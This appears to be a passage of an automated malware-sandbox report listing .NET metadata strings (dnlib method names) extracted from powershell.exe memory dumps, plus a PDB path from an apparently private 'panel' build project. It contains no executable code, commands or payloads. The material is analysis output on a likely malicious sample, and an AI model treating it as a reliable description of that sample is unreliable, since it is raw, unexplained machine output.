                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
